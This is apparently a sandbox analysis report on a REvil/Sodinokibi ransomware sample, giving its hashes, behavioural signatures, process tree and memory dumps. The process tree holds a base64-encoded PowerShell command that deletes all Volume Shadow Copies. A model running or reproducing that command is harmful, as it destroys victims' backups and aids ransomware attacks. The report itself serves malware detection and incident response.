Analysis

  • max time kernel
    164s
  • max time network
    168s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-05-2023 02:52

General

  • Target

    2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe

  • Size

    4.5MB

  • MD5

    be059dd5f3442f498bde97f69265ccbd

  • SHA1

    28a8eae3633023961f3bcc3d473b0aa1943676c4

  • SHA256

    93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7

  • SHA512

    493de3059a33e9ce8bcf67dfea31af6525764917729aeb7705eec20ab78eae3d216ddc6d9d4bebcbf7fa7748e92aa4efa1f0dbcd4e67c142c8c33a317c7c421d

  • SSDEEP

    49152:8gLzRnMBdi16dZ4gTCZZ8JerhvIBfdsl0:8+z2E6X4g8o

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe
    "C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4464
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4124
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:4664
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4004

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ho0j3cub.pfh.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/4124-142-0x00000145FF9C0000-0x00000145FF9E2000-memory.dmp
      Filesize

      136KB

    • memory/4124-143-0x0000014599AE0000-0x0000014599AF0000-memory.dmp
      Filesize

      64KB

    • memory/4124-144-0x0000014599AE0000-0x0000014599AF0000-memory.dmp
      Filesize

      64KB

    • memory/4124-145-0x0000014599AE0000-0x0000014599AF0000-memory.dmp
      Filesize

      64KB

    • memory/4124-147-0x0000014599AE0000-0x0000014599AF0000-memory.dmp
      Filesize

      64KB

    • memory/4124-146-0x0000014599AE0000-0x0000014599AF0000-memory.dmp
      Filesize

      64KB

    • memory/4124-148-0x0000014599AE0000-0x0000014599AF0000-memory.dmp
      Filesize

      64KB